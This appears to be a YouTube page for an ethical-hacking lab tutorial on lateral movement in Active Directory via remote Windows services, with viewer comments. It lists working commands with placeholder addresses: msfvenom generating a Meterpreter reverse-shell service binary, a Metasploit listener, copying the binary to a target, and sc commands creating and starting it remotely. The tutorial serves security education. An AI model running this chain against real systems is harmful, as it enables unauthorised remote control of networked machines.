How to Pivot (Lateral Movement) in Active Directory Using SCM
HTML-код
- Опубликовано: 7 окт 2024
- In this video we look at how to pivot within an Active Directory network environment using SCM otherwise known as Windows Service Control Manager.
Commands ran in video:
to create the payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=IP LPORT=PORT -f exe-service -o ~/Desktop/testservice.exe
to create a listener:
1. msfconsole
2. use exploit/multi/handler
3. set LHOST YOUR IP
4. set LPORT IP TO MATCH PAYLOAD
to create a copy a file over to another host:
copy FILE \\HOST IP
to create a remote service:
sc \\TARGET IP create SERVICENAME binpath=PAYLOAD LOCATION
to execute the remote service:
sc \\TARGET IP start SERVICENAME
Enjoy!
All material provided on this video and this channel is intended for informational/educational purposes only and should not be performed
unless you have permission to do so. These videos are to be performed
within a virtual lab for ethical hacking education only. We are not responsible for any misuse, damages, and or loss of data due to misuse
of this information.
I just discovered your videos and they are very interesting. But I'm not sure if you forgot to say or if you use a built in exploit but this all wouldn't be possible if you weren't domain administrator on the compromised windows 10 machine.
In normaly business enviroments not every domain user is also domain admin and mostly you aren't even local administrator on your machine. So without local admin perms on the domain controller, you wouldn't be able to create a new service or a new scheduled task like in your other video.
Did you thought about a community discord? I would be interested to discuss such ideas in a wider community.
I haven’t created a discord yet, I thought about it though. I’m often times very busy and make videos on the side. I don’t make videos full time yet as I work full time in cyber currently.
what should i do when i rund command sc \\IP create test binpath=... it return acess is dennied . Thank you
Hi, thanks for this video, but i need to know one thing should there be any thing i have to setup or install in the DC for me to be able to copy from windows to to DC, do i need to enable any service or some thing
Nope! Nothing at all. As long as the windows host is added to the domain, you’re good to go.
@@officialexploitacademy thanks for this reply ... yes my windows 10 is joined to the my DC and both on same network, but the copy command is not working and i have am admin in my windows 10
@@wunderjoseph1136 that is interesting… what error is it giving you? Is the domain controller on running in the background?